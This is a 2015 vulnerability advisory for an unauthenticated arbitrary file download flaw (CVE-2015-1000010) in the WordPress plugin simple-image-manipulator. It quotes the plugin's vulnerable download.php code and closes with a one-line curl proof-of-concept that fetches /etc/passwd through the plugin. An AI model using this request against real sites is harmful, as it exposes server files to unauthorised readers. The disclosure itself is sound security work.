Advisory #: 147
Title: Arbitrary file download in simple-image-manipulator v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-16
CVE-ID:[CVE-2015-1000010]
CWE: CWE-284 Improper Access Control
Download Site: https://wordpress.org/plugins/simple-image-manipulator
Vendor: https://profiles.wordpress.org/kevartpatel/
Vendor Notified: 2015-07-16
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=144
Description: Manipulate your wordpress images using slider and tickboxes.
Vulnerability:
In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location: 2 function output_file($file, $name, $mime_type='') 3 { . . . 14 /* Figure out the MIME type | Check in array */ 15 $known_mime_types=array( 16 "pdf" => "application/pdf", 17 "txt" => "text/plain", 18 "html" => "text/html", 19 "htm" => "text/html", 20 "exe" => "application/octet-stream", 21 "zip" => "application/zip", 22 "doc" => "application/msword", 23 "xls" => "application/vnd.ms-excel", 24 "ppt" => "application/vnd.ms-powerpoint", 25 "gif" => "image/gif", 26 "png" => "image/png", 27 "jpeg"=> "image/jpg", 28 "jpg" => "image/jpg", 29 "php" => "text/plain" 30 ); 31 32 if($mime_type==''){ 33 $file_extension = strtolower(substr(strrchr($file,"."),1)); 34 if(array_key_exists($file_extension, $known_mime_types)){ 35 $mime_type=$known_mime_types[$file_extension]; 36 } else { 37 $mime_type="application/force-download"; 38 }; 39 }; . . . 84 if ($file = fopen($file, 'r')) 85 { 86 if(isset($_SERVER['HTTP_RANGE'])) 87 fseek($file, $range); 88 89 while(!feof($file) && 90 (!connection_aborted()) && 91 ($bytes_send<$new_length) 92 ) 93 { 94 $buffer = fread($file, $chunksize); 95 print($buffer); //echo($buffer); // can also possible 96 flush(); 97 $bytes_send += strlen($buffer); 98 } 99 fclose($file); 100 } else 101 //If no permissiion 102 die('Error - can not open file.'); 103 //die 104 die(); 105 } 106 //Set the time out 107 set_time_limit(0); 108 109 110 //Call the download function with file path,file name and file type 111 output_file($_REQUEST['filepath'], ''.$_REQUEST['filename'].'', 'text/plain');
Export: JSON TEXT XML
Exploit Code:
  1. curl -sk "http://www.vapidlabs.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
Screen Shots:
Notes: